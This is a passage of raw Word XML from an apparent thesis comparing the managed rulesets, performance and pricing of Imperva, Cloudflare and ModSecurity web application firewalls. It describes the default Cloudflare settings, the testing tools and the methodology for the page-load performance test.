    </w:p>
    <w:p w14:paraId="26DC04C2" w14:textId="0E8E24F6" w:rsidR="00D81CD4" w:rsidRDefault="00D81CD4" w:rsidP="003034BD">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476CEC7C" wp14:editId="123B5D85">
            <wp:extent cx="5657850" cy="6608766"/>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4727" cy="6616798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CA956" w14:textId="7244FC51" w:rsidR="003034BD" w:rsidRDefault="003034BD" w:rsidP="003034BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc71138530"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Cloudflare managed ruleset default settings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="3A640E3B" w14:textId="2AC960C5" w:rsidR="004C2A9E" w:rsidRDefault="004C2A9E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The rule group, Cloudflare Specials, was the most relevant rule group to this thesis</w:t>
      </w:r>
      <w:r w:rsidR="00130FB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, where most of the OWASP top 10 attack rules were found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0001735E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the rule group link was clicked, a list of 310 managed rules were listed</w:t>
      </w:r>
      <w:r w:rsidR="005B677B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00E56A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="0001735E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. Within the list, the rule IDs, description and modes were detailed. </w:t>
      </w:r>
      <w:r w:rsidR="003F195E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>No configuration was changed to this list. All the modes were left as default setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01751AC9" w14:textId="796D649F" w:rsidR="0001735E" w:rsidRDefault="0001735E" w:rsidP="000D3EC5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7744AC" wp14:editId="3C91EE38">
            <wp:extent cx="5731510" cy="45148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514850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA1BAC" w14:textId="45C73D24" w:rsidR="000D3EC5" w:rsidRDefault="000D3EC5" w:rsidP="000D3EC5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc71138531"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Cloudflare specials rule group default settings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="5B423F11" w14:textId="6D77180C" w:rsidR="0004032A" w:rsidRDefault="006D69D4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare also had an additional package, OWASP ModSecurity Core Rule Set available. This meant that users were given the option to have OWASP ModSecurity CRS enabled as an addition to their managed rulesets. </w:t>
      </w:r>
      <w:r w:rsidR="00D660C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, this package was turned off. No changes were made, the package was left turned off as the intention of this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">thesis </w:t>
      </w:r>
      <w:r w:rsidR="00D660C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">was to test the managed rulesets of the </w:t>
      </w:r>
      <w:r w:rsidR="00EE57C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidR="00D660C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1988B" w14:textId="135385B9" w:rsidR="003B4B57" w:rsidRDefault="003B4B57" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The WAFs were now ready to be tested. As such, we have concluded the onboarding and configuring of the three WAFs</w:t>
      </w:r>
      <w:r w:rsidR="00F23766">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, with only Imperva’s cloud WAF requiring minimal changes to the default settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1F9AE" w14:textId="1AF69F67" w:rsidR="00F81A8F" w:rsidRPr="009A00F7" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc71138492"/>
      <w:r>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r w:rsidR="00F81A8F" w:rsidRPr="009A00F7">
        <w:t>Test Plan</w:t>
      </w:r>
      <w:r w:rsidR="005C190F">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="2AF06A08" w14:textId="07AB4415" w:rsidR="0084718D" w:rsidRDefault="009C1928" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">With the necessary setup of the webservers and onboarding of the three WAFs completed, this subsection will take a look at the </w:t>
      </w:r>
      <w:r w:rsidR="00C734AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">tools that would be used in the tests, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">test plans on how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the tests for the WAFs would be carried out</w:t>
      </w:r>
      <w:r w:rsidR="00AE009A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each category</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A06FB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The WAFs would be tested and compared in four categories; price, performance, WAF alerts and usability and lastly, security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08445A16" w14:textId="7F3E1A2F" w:rsidR="001D3A2A" w:rsidRPr="001D3A2A" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc71138493"/>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="001D3A2A" w:rsidRPr="001D3A2A">
        <w:t>Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="67EE10E5" w14:textId="6C3788C3" w:rsidR="001D3A2A" w:rsidRDefault="008D6EA4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D143FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The tools that would be used to perform the tests for this thesis </w:t>
      </w:r>
      <w:r w:rsidR="00D143FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r w:rsidR="009D6836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Catchpoint,</w:t>
      </w:r>
      <w:r w:rsidR="0023280E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a web browser</w:t>
      </w:r>
      <w:r w:rsidR="009D6836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00D143FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r w:rsidR="0023280E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Community Edition</w:t>
      </w:r>
      <w:r w:rsidR="00D143FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB07FD4" w14:textId="5BE3C6B9" w:rsidR="009D6836" w:rsidRDefault="009D6836" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Catchpoint was used for the performance test. Catchpoint had 16 types of tests available, some of which include web, FTP, ping and traceroute. </w:t>
      </w:r>
      <w:r w:rsidR="00D148E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The test type that would be used in the performance test was web. Catchpoint provided many configuration options such as browser models and nodes, also known as the client.</w:t>
      </w:r>
      <w:r w:rsidR="000A61AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> There were 855 nodes available across 86 countries and 298 providers</w:t>
      </w:r>
      <w:r w:rsidR="00EF2B18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, according to Catchpoint (2021)</w:t>
      </w:r>
      <w:r w:rsidR="000A61AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E136FE" w14:textId="1C56D831" w:rsidR="00074554" w:rsidRDefault="00074554" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Any modern web browsers could be used for the tests. Firefox was used to access the web applications </w:t>
      </w:r>
      <w:r w:rsidR="00165348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> performing the security tests</w:t>
      </w:r>
      <w:r w:rsidR="00347E19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this thesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1611B1" w14:textId="17D2E500" w:rsidR="00E5385A" w:rsidRDefault="00E5385A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Burp Suite Community Edition was used as a local proxy to intercept the requests made from the web browser. The intercepted requests would then be tampered with and repeated, emulating a brute force attack, with the intruder function found in the tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4430CDDE" w14:textId="3EBF8DE9" w:rsidR="003F7208" w:rsidRPr="00C34B1F" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc71138494"/>
      <w:r>
        <w:t xml:space="preserve">3.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="003F7208" w:rsidRPr="00C34B1F">
        <w:t>Price Comparison</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="7B3C4613" w14:textId="647B8230" w:rsidR="003F7208" w:rsidRDefault="00CA0058" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The prices gathered were based on the price lists available on the internet at the time the onboarding of the WAFs were done. The prices may not be accurate due to a few reasons such as the varying taxes in different countries and price list not directly available on the official product website, where option to request for a quote from the sales department.</w:t>
      </w:r>
      <w:r w:rsidR="00D662D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In cases where prices were not directly available on the product website, the prices available on review websites would be taken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22322D92" w14:textId="20C72B24" w:rsidR="003F7208" w:rsidRPr="00C34B1F" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc71138495"/>
      <w:r>
        <w:t xml:space="preserve">3.4.3 </w:t>
      </w:r>
      <w:r w:rsidR="003F7208" w:rsidRPr="00C34B1F">
        <w:t>Performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="381B0436" w14:textId="6BC43052" w:rsidR="008F2468" w:rsidRDefault="009643FC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Performance of each WAF would be tested based on the average duration taken to load the index page of each website</w:t>
      </w:r>
      <w:r w:rsidR="0066618B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, let’s call it the page load test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. The index page of all the websites </w:t>
      </w:r>
      <w:r w:rsidR="00163E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> identical</w:t>
      </w:r>
      <w:r w:rsidR="00E20AE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, 243 bytes in size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, with </w:t>
      </w:r>
      <w:r w:rsidR="00163E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>content saying “This is a test site”</w:t>
      </w:r>
      <w:r w:rsidR="00163E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and metatag in </w:t>
      </w:r>
      <w:r w:rsidR="00163E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the headers to instruct no caching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C97880">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The performance of the WAFs would be compared against the web server with no WAF configured, which would serve as a benchmark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A53757" w14:textId="62ECCFEE" w:rsidR="003F7208" w:rsidRDefault="008F2468" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It was also important to note that Imperva’s and Cloudflare’s cloud WAFs</w:t>
      </w:r>
      <w:r w:rsidR="00163E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were both integrated with their very own CDNs. This would result in different traffic routes from client to the web servers.</w:t>
      </w:r>
      <w:r w:rsidR="00C97880">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D52AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Traffic routes towards the web server with no WAF configured and the web server with ModSecurity’s WAF configured would be expected to be similar as they both were not integrated with any CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD6ED0" w14:textId="1350F417" w:rsidR="00C26C85" w:rsidRDefault="004D52AA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To ensure that the test was not flawed, precautions were taken and configurations were made to ensure that the content of the load test was served by the web server and not from the CDNs</w:t>
      </w:r>
      <w:r w:rsidR="00671765">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cache.</w:t>
      </w:r>
      <w:r w:rsidR="00671765">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The configuration change made was to disable caching on Imperva’s and Cloudflare’s portals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D486B25" w14:textId="5C69A22F" w:rsidR="003E3878" w:rsidRDefault="003E3878" w:rsidP="003E3878">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">On Imperva’s portal, it was straightforward and was simply done by setting the cache mode to “No caching” as shown in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00E56A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. By default, the selected option was “Smart caching”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E435776" w14:textId="46C2CB56" w:rsidR="003E3878" w:rsidRDefault="003E3878" w:rsidP="003E3878">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587F2ECB" wp14:editId="2233154A">
            <wp:extent cx="5731510" cy="18592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59280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF726B" w14:textId="3DC4C3CD" w:rsidR="003E3878" w:rsidRDefault="003E3878" w:rsidP="003E3878">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc71138532"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
